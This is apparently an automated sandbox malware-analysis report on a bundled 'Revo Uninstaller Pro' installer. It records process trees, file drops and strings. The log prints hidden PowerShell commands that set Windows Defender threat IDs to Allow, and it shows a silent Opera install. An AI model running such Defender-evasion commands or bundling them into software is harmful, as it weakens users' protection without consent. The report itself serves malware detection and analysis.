        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,16_2_002E6FC6
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,27_2_00403665
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETE8C2.tmpJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETE8C2.tmpJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\DRIVERS\SETE8C2.tmpJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\drivers\SETE8C2.tmpJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00406DC00_2_00406DC0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F626D16_2_002F626D
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E83C016_2_002E83C0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030C0B016_2_0030C0B0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E30FC16_2_002E30FC
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030011316_2_00300113
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FF3CA16_2_002FF3CA
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F33D316_2_002F33D3
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EE51016_2_002EE510
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030C55E16_2_0030C55E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030054816_2_00300548
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EF5C516_2_002EF5C5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F364E16_2_002F364E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0031065416_2_00310654
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F66A216_2_002F66A2
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E269216_2_002E2692
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F589E16_2_002F589E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FF8C616_2_002FF8C6
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F397F16_2_002F397F
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EE97316_2_002EE973
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EDADD16_2_002EDADD
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EBAD116_2_002EBAD1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00303CBA16_2_00303CBA
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FFCDE16_2_002FFCDE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F6CDB16_2_002F6CDB
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E5D7E16_2_002E5D7E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E3EAD16_2_002E3EAD
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00303EE916_2_00303EE9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EDF1216_2_002EDF12
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0451B57817_2_0451B578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0451B56917_2_0451B569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04ABB57823_2_04ABB578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04ABB56923_2_04ABB569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_085E3AA823_2_085E3AA8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_048AB57825_2_048AB578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_048AB56925_2_048AB569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_083A3AA825_2_083A3AA8
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00406DC027_2_00406DC0
        Source: Joe Sandbox ViewDropped File: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 002FD870 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 002FD940 appears 51 times
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: String function: 002FE2F0 appears 31 times
        Source: setup.exe.28.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
        Source: setup.exe.29.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
        Source: ruplp.exe.0.drStatic PE information: Number of sections : 11 > 10
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameinetc.dllF vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUnPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerevoflt.sysJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRevoUPPort.exe@ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal44.troj.evad.winEXE@44/128@9/8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002E6D06 GetLastError,FormatMessageW,16_2_002E6D06
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,27_2_00403665
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002F963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,16_2_002F963A
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo GroupJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\Desktop\Revo Uninstaller Pro.lnkJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RevoUninstallerPro}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Opera/Installer/C:/Users/user/AppData/Local/Programs/Opera
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nso8F38.tmpJump to behavior
        Source: Yara matchFile source: 9.0.ruplp.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: ps216_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxname16_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxstime16_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: STARTDLG16_2_002FCBB8
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
        Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
        Source: unknownProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=NWM4YWUzOWQyNTkwZGNkMDZiZDFlODcxMDg5YWFhOTYzNGRjMWI4Njg0MWE5OGMxZDBhOGNkY2I2N2FlOTg3ZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MjM5OC4xNDI4IiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6IjVlOWNkMGQ0LWE0NjMtNDMxNy05NTg0LTU2ZDIwN2Y0ZWE3NCJ9
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"Jump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bcJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECTJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -rJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -oJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
